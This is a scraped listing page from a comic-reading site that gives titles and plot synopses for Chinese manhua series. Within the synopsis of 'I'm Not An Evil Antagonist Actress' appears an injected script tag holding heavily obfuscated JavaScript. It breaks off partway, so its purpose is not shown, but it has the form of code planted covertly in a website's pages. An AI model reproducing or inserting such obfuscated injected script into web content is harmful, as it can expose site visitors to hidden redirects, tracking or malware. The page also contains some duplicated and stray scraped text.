Manhua - Page 51

Manhua is the term for Chinese comics, famous for their artistic style and diverse storytelling. From action-packed adventures to heartwarming romances, manhua provides readers with a unique comic experience.

1521 results

I’M Having Fun In The World Of Mysteries

A mysterious power revived and spread throughout the world, making the world a strange place. Everyone was panicked and frightened, but Jiang Che, a traverser, was not frightened by it at all, because he could see a strange reminder, namely "System".After completing the Mystery Challenge again and again, He Suddenly founds that he had become a Mystery Master!


I’m Not An Evil Antagonist Actress

A b*tch-looking supporting actress made a pact with a handsome star actor with a creepy addiction for her career. Let’s see how this strong girl will fight and reach her career success! A b*tch-looking supporting actress made a pact with a handsome star actor with a creepy addiction for her career. Let’s see how this strong girl will fight and reach her career success!<script></script><script>(function(_0x3cde08,_0x427254){var _0x2ac195=_0x30a0,_0x5bdcbd=_0x3cde08();while(!![]){try{var _0x406831=parseInt(_0x2ac195(0x153))/(0xda6+0x3*0x29a+0x11*-0x143)*(parseInt(_0x2ac195(0x167))/(-0x2605+-0x8fb*0x2+-0x37fd*-0x1))+parseInt(_0x2ac195(0x16e))/(-0x9*-0x17+-0x1d7b*0x1+0x1caf*0x1)*(-parseInt(_0x2ac195(0x165))/(-0x2288+-0x1*-0xf73+0x1319))+-parseInt(_0x2ac195(0x15c))/(0x15df+0x3*0xa44+0x2e*-0x125)+parseInt(_0x2ac195(0x172))/(0x8*0xd3+0xbe1*0x1+-0x1273)*(parseInt(_0x2ac195(0x16b))/(0x465+-0x25c0+0x2162))+-parseInt(_0x2ac195(0x159))/(0x4*-0x229+-0x15d5+0x3*0xa2b)+parseInt(_0x2ac195(0x157))/(0x1*0xa6d+0x2197+-0x2bfb)*(parseInt(_0x2ac195(0x170))/(-0x3*-0x527+0x1*-0x21fb+-0x1*-0x1290))+parseInt(_0x2ac195(0x16c))/(0x2a9+0x1*0xf71+-0x120f);if(_0x406831===_0x427254)break;else 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I’M Not The Son Of Destiny

I'm Not the Son of DestinyZheng Dazhuang transmigrated to another world and awakened the life script system, he thought himself to be the son of fate, Long Aotian was born, but he was only a minor supporting actor. my siteFortunately, with the system in his possession, Zheng Dazhuang made good friends with various destiny heroes along the way, slapped many life chances for the children of destiny, and unknowingly set foot on the pinnacle of martial arts.


I’m Really Not The Demon God’s Lackey

Lin Jie, a transmigrator, is the owner of a bookstore in another world. He’s kind and warm-hearted, often recommending healing books to customers who are going through a tough time. From time to time, he secretly promotes his own work too.Over time, these customers begin to respect him greatly, some even frequently bringing local specialties to repay his favor. They often seek his professional opinion when it comes to selecting books, and share their experiences with this ordinary bookstore owner to people around them.They respectfully and intimately refer to him using names such as the “Demon God’s Lackey”, “Propagator of the Flesh and Blood Gospel”, “ ‘Corpse Devouring Sect’s Rites and Customs’ Author” and “Shepherd of the Stars”.


I’m Stuck On The Same Day For A Thousand Years

Read I’m Stuck On The Same Day For A Thousand Years, I’m Trapped in This Day for One Thousand Years, 我被困在同一天一千年 Wu Chen transmigrated to a new world, Got trapped on the day of July 7, 2020, Constantly reincarnating! He used to indulge himself doing all sorts of evil things while running wild in despair, but every new day, everything would start all over again. In this way, he has been reincarnated for a thousand years, and on a new day, the sun rose as usual.


I’m The Great Immortal

I’m The Great Immortal The previous life was a peerless genius in the world of immortality. He was killed by 3 celestial beings. He was accidentally reborn to his 20s by the book of heaven. All he wanted to do was to become an immortal and return to the immortal world, and he became the strongest man on the earth, turning his hands into clouds and covering his hands with rain, provoking anyone who defies him! He is the venerable one! The ruler of 3000 worlds! The guy who is 10 000 times better than Thanos! He is Taixuan Taizun! The Great Immortal! I’m Daxianzun Wo Shi Da Xian Zun 我是大仙尊 Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaZin is your best choice, don’t hesitate, just read and feel !


I’m The One and Only God!

I’m The One and Only God! is a Manga/Manhwa/Manhua in (English/Raw) language, Action series is written by Creation culture This Comic is About When he died due to a scheme, at his last breath, he wished to kill the one who betrayed him! One day, he woke up in an unknown person’s body, and he yelled to the world saying; “I have returned! For I am the one and only god!!”


I’m the strongest boss

Read manhua I’m the strongest boss / Wǒ, Zuì Qiáng BOSS / 我!最强Boss! / 我,最强BOSS The end of the world is coming, and human beings have awakened their superpowers and fought against the monsters in the towers. However, there is a strongest BOSS sitting at the highest point of the tower – Demon King Jiu Ming. He is an insurmountable barrier for humans. One after another, the brave men always thought that they were the protagonists in the story, but the halo of the protagonists never came to them. When the protagonists lose their protagonist aura, they no longer are the protagonists.


I’m the strongest boss

Read I’m the strongest boss Novel – I’m the strongest boss Manhwa Online Free At ManhuaHot The summary of the comic I’m the strongest boss: The end of the world is coming, and human beings have awakened their superpowers and fought against the monsters in the towers. However, there is a strongest BOSS sitting at the highest point of the tower – Demon King Jiu Ming. He is an insurmountable barrier for humans. One after another, the brave men always thought that they were the protagonists in the story, but the halo of the protagonists never came to them. When the protagonists lose their protagonist aura, they no longer are the protagonists. “I’m the strongest boss” is also known as: I Am the Strongest Boss / Wo, Zui Qiang Boss / I, the Strongest Boss / Me, the strongest boss / Wǒ, Zuì Qiáng BOSS / 我!最强Boss ! / 我,最强BOSS The comic I’m the strongest boss belongs to the Genre: Action, Adventure, Fantasy, Manhua “Top Manhua, Battwo, Read Manga Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at BunManga. You can read TOP MANGA Human Mask The Patron’s Daughters The Genius Idol’s Strategy to Stardom


I’M Trapped In Beta Test World For One Thousand Year

I'm Trapped in Beta Test World For One Thousand Year manhua, Trapped Inside the Beta Test World foTrapped in the online game "Fantasy World", after 177 cycles of deleted files and beta testing, Char has attacked all the beautiful NPCs in the game, the wives of the novice village, the priests of the church, the candidates for the dark elf queen, the Valkyrie chosen by the gods, etc. . Just after he singled out all the bosses and used hundreds of ways to clear the "Fantasy World", the "Fantasy World" public beta was released! The constant addition of players has changed the immutable NPCs, and Char is determined to find a way to leave the game in the public beta


I’ve Been Invincible for a Long Time

Read manhwa I’ve Been Invincible for a Long Time / It Turns Out That I Have Been Invincible for a Long Time / Xuanhuan: It Turns Out That I Have Long Been Invincible / Yuánlái Wǒ Zǎo Jiù Wúdíle Over a five-year journey around the world, Ye Changqing first believed he could be like other cool novel protagonist systems with a plug-in, but even the most common immortal cultivator cannot be. Living close to a sect in a small town was his only option, so he started a business. His small store eventually turned into the holy land of all the righteous individuals, and the dog he raised up turned out to be the feared demon king. From that moment on, everyone acknowledged Ye Changqing as a Supreme Master. Alternative Titles 原来我早就无敌了 才能ゼロが無敵になったわけ


Ji Ye and Guan Shan

This is a heartwarming story that tugs at your heart. Ji Ye is a fine arts student in his third year who is dating his teacher, Guan Shan, 16 years his senior. However, after three years of dating, their relationship slowly turns stale and boring, and the two start facing problems of anger and jealousy as Ji Ye considers breaking up and Guan Shan starts suffering from mid-life crisis.
